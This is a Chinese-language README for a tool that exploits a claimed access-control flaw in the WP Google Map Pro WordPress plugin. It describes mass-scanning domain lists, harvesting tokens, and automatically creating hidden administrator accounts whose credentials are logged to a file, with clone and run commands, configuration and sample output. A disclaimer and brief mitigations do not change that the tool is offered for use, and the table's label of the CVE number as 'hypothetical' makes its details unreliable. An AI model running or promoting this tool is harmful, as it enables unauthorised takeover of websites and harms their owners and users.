该工具利用 CVE-2026-8732,这是 WordPress 的 WP Google Map Pro 插件中存在的一个漏洞。该漏洞允许未认证的攻击者通过 AJAX 端点(admin-ajax.php?action=wpgmp_temp_access_ajax)获取有效的 wpmp_token。利用此令牌,攻击者可以访问 WordPress 管理面板并创建新的管理员用户。
该工具可对域名列表执行批量扫描,提取 nonce 和令牌,并自动在易受攻击的站点上创建隐藏的管理员账户。结果会实时保存,包含完整的令牌详细信息。
⚠️ 免责声明: 此工具仅用于教育和授权安全测试。请仅对您拥有或已获得明确测试许可的系统使用。作者对任何滥用行为不承担责任。
更多免责声明:您可以在 Jenderal92 的封面页查看免责声明。您可以点击 此处 !!! 查看
| 字段 | 值 |
|---|---|
| CVE ID | CVE-2026-8732(针对此插件的假设性编号) |
| 受影响插件 | WP Google Map Pro(版本 <= 1.5.0) |
| 漏洞类型 | 失效的访问控制 / 权限提升 |
| 攻击向量 | 未认证、远程 |
| 影响 | 通过创建管理员账户实现完全接管站点 |
admin_created.txthttp:// 和 https://requests 库安装所需库:
pip install requests
🚀 安装
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
🎯 使用方法
准备目标列表文件(每行一个域名):
example.com
https://target-website.com
http://vulnerable-site.org
运行扫描器:
python2 exploit.py targets.txt
输出文件
| 文件 | 内容 |
|---|---|
| res.txt | 易受攻击的域名及其完整令牌和重定向 URL(如有) |
| admin_created.txt | 成功创建的管理员凭据(域名、用户名、密码、邮箱) |
示例输出
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ 配置
编辑脚本中的以下变量:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 工作原理
wpgmp_local 或 fc-call-nonce。/wp-admin/admin-ajax.php 发送 POST 请求,携带 action=wpgmp_temp_access_ajax 以及获取到的 nonce。/wp-admin/user-new.php,提取 _wpnonce_create-user,并提交 POST 请求以创建新的管理员用户。users.php(HTTP 302),或在用户列表中搜索新用户名以确认成功。🛡️ 缓解措施
· 将 WP Google Map Pro 更新到最新的已修补版本。
· 通过自定义代码或防火墙禁用 AJAX 操作 wpgmp_temp_access_ajax。
· 使用 Web 应用防火墙(WAF)阻止对 admin-ajax.php 的恶意请求。
⭐ 免责声明
本软件按“原样”提供,不附带任何形式的保证。软件质量与性能的全部风险由您自行承担。请负责任地使用,并且仅对您有权测试的系统使用。